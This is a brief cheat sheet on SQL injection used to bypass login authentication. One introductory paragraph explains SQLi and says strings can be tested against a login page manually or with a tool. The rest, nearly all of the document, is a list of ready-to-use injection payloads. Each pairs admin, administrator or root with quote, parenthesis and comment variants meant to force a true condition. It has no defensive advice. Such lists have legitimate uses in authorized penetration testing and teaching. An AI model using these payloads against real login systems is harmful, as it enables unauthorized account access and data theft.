SQL Injection Authentication Bypass Cheat Sheet
SQL injection, also known as SQLi, is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Specifically, SQL injection to bypass authentication involves testing a series of strings against the login page or its parameters. This can be done either manually or with an automated tool.
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
administrator' --
administrator' #
administrator'/*
administrator' or '1'='1
administrator' or '1'='1'--
administrator' or '1'='1'#
administrator' or '1'='1'/*
administrator'or 1=1 or ''='
administrator' or 1=1
administrator' or 1=1--
administrator' or 1=1#
administrator' or 1=1/*
administrator') or ('1'='1
administrator') or ('1'='1'--
administrator') or ('1'='1'#
administrator') or ('1'='1'/*
administrator') or '1'='1
administrator') or '1'='1'--
administrator') or '1'='1'#
administrator') or '1'='1'/*
administrator" --
administrator" #
administrator"/*
administrator" or "1"="1
administrator" or "1"="1"--
administrator" or "1"="1"#
administrator" or "1"="1"/*
administrator"or 1=1 or ""="
administrator" or 1=1
administrator" or 1=1--
administrator" or 1=1#
administrator" or 1=1/*
administrator") or ("1"="1
administrator") or ("1"="1"--
administrator") or ("1"="1"#
administrator") or ("1"="1"/*
administrator") or "1"="1
administrator") or "1"="1"--
administrator") or "1"="1"#
administrator") or "1"="1"/*
root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root"or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*